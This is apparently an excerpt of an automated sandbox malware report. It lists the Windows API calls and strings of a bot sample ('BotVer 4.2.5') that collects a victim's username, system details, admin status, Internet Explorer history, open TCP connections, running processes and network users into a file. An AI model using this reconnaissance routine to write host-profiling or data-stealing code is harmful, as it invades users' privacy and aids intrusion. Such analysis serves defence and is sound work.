                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0211E5B0940370AAE7216F509C887AC7A6CEB2471CF202564E906623C0CB71DD99E6F1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D367D0,00000000,00000000,00000000), ref: 02D37234
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3724C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3725D
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 02D37265
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4233414108-0
                                                                                                                                                                                                                • Opcode ID: 76c0942a4cd9e54bbcb9c609c9c87a236f8e7a2dd6b73add8a4bc1b6b870f85f
                                                                                                                                                                                                                • Instruction ID: 3783288450ae7379de129aec427c1c7bb1d8a9398f36de158bee075457a671f2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76c0942a4cd9e54bbcb9c609c9c87a236f8e7a2dd6b73add8a4bc1b6b870f85f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E06D70E89714BBF3214A90EC0EF5E7BA8BB05B45F644440FA01A63C1D7F0AE4486B4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02D22A6F
                                                                                                                                                                                                                • exit.MSVCRT ref: 02D22A80
                                                                                                                                                                                                                • free.MSVCRT(00000000,00000000,00000000,?,?,?,?,02D22E41,00000000,00000000), ref: 02D22AC3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                • Opcode ID: 65fcd995527c31f5b937de50f6087a27ad0c3e36349f500f92e36fc5f97f1f9f
                                                                                                                                                                                                                • Instruction ID: f9a7a01704919fa777aef1d12a1145efe2f74ec9376dfd624c4e85bb3eebb139
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65fcd995527c31f5b937de50f6087a27ad0c3e36349f500f92e36fc5f97f1f9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF018F75644228ABD7208F48EC89FAB7BA9EFA8764F400518FE0587301C770EC55CAF1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040218C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                • Opcode ID: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
                                                                                                                                                                                                                • Instruction ID: d0e749ada70b16f267b0096a5882ad0ed8cb575b22d8ef64c6acb779e6c27845
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6D05E76E05729CBCB20DF94A5052AEF730FB45731F0083AADE247338083351C118AD4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,02D7D3A4,75B05CE0), ref: 02D249F4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?), ref: 02D24A14
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D24A25
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,?,00000000), ref: 02D24A35
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02D24A46
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24A5A
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02D24A67
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,4.2.5,00000005,00000000,00000000), ref: 02D24A77
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02D24A88
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24A9C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24AA9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24AB9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02D24ACA
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D24ADE
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24AF2
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02D24AFF
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02D24B0F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02D24B20
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24B4C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24B5B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24B6F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D24B82
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24B96
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24BA3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24BB3
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24BC4
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 02D24BD5
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24BE9
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24BF6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02D24C06
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24C17
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24C42
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24C51
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24C65
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24C78
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24C8C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24C99
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24CA9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24CBA
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02D24CD1
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24CE5
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24CF2
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02D24D02
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24D13
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24D3E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24D4D
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24D61
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24D74
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24D88
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24D95
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24DA5
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24DB6
                                                                                                                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 02D24DBC
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D24DD6
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24E43
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24E50
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02D24E60
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24E71
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24E9C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24EAB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24EBF
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24ED2
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24EE6
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24EF3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24F03
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24F14
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02D24F1E
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 02D24F25
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 02D24F2E
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 02D24F37
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D24F4F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24F66
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D24F73
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02D24F83
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D24F94
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24FBF
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24FCE
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24FE2
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24FF5
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25009
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25016
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25026
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25037
                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02D25057
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2506B
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02D25078
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02D25088
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02D25099
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D250C4
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D250D3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D250E7
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D250FA
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2510E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D2511B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D2512B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D2513C
                                                                                                                                                                                                                • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02D2515C
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25170
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02D2517D
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02D2518D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02D2519E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D251CC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D251DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D251EF
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25202
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25216
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25223
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25233
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25244
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 02D25251
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D252B2
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D252C9
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02D252D6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02D252E6
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02D252F7
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25322
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25331
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D25345
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25358
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2536C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25379
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25389
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D2539A
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D253AE
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D253BB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02D253CB
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D253DC
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2541C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D2542B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D2543C
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,02D23CCD,00000000,00000000,00000000), ref: 02D2544F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25463
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25470
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25480
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25491
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D254A3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D254B7
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02D254C4
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02D254D4
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02D254E5
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25510
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D2551F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D25533
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25546
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2555A
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25567
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25577
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25588
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2559C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02D255A9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02D255B9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02D255CA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D255D0
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D255F3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25625
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D25634
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D25645
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D25658
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2566C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25678
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25688
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25696
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02D246E5
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: _snprintf.MSVCRT ref: 02D2470D
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02D24747
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24769
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24775
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: WriteFile.KERNEL32(00000000,IE history:,0000000C,02D256A1,00000000), ref: 02D24789
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24797
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D247AB
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247B7
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: WriteFile.KERNEL32(00000000,02D65B10,00000001,00000000,00000000), ref: 02D247CB
                                                                                                                                                                                                                  • Part of subcall function 02D246C0: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247D9
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,74DF3490), ref: 02D23F5D
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: HeapAlloc.KERNEL32(00000000), ref: 02D23F60
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: memset.MSVCRT ref: 02D23F74
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02D23FE4
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D23FF2
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: HeapValidate.KERNEL32(00000000), ref: 02D23FF5
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24002
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: HeapFree.KERNEL32(00000000), ref: 02D24005
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02D2401D
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: HeapAlloc.KERNEL32(00000000), ref: 02D24020
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: memset.MSVCRT ref: 02D24030
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02D2404A
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24057
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: HeapValidate.KERNEL32(00000000), ref: 02D2405A
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D2406B
                                                                                                                                                                                                                  • Part of subcall function 02D23F40: HeapFree.KERNEL32(00000000), ref: 02D2406E
                                                                                                                                                                                                                  • Part of subcall function 02D24290: memset.MSVCRT ref: 02D242C3
                                                                                                                                                                                                                  • Part of subcall function 02D24290: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D242CE
                                                                                                                                                                                                                  • Part of subcall function 02D24290: Process32First.KERNEL32 ref: 02D242F1
                                                                                                                                                                                                                  • Part of subcall function 02D24290: GetHandleInformation.KERNEL32(00000000,?), ref: 02D2430D
                                                                                                                                                                                                                  • Part of subcall function 02D24290: CloseHandle.KERNEL32(00000000), ref: 02D24327
                                                                                                                                                                                                                  • Part of subcall function 02D244D0: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,74DF3490,?,?,?,?,02D256B3,00000000), ref: 02D2451A
                                                                                                                                                                                                                  • Part of subcall function 02D244D0: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02D256B3,00000000,00000000,00000000), ref: 02D24565
                                                                                                                                                                                                                  • Part of subcall function 02D244D0: HeapAlloc.KERNEL32(00000000,?,?,?,?,02D256B3,00000000,00000000,00000000), ref: 02D2456C
                                                                                                                                                                                                                  • Part of subcall function 02D244D0: memset.MSVCRT ref: 02D2457F
                                                                                                                                                                                                                  • Part of subcall function 02D244D0: _snprintf.MSVCRT ref: 02D245CA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D256C4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D256D5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSystem_snprintf$AllocUser$AdminCloseCreateFormatFreeMetricsNameQueryTableTimeValidate$CapsDateDefaultDeviceDirectoryDisplayEnvironmentFirstLangModuleOpenProcess32SnapshotToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                                • String ID: %c%d:%02d$%dx%d@%d$4.2.5$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                                • API String ID: 58573281-2909121063
                                                                                                                                                                                                                • Opcode ID: dbba8f8f4dfc7647160e93b1fc450247ae37353af0cbececea694a39a7fb0223
                                                                                                                                                                                                                • Instruction ID: 5950db4e87c317bce4b54742063913cab83ef304021a53034a1e4eec4085bc17
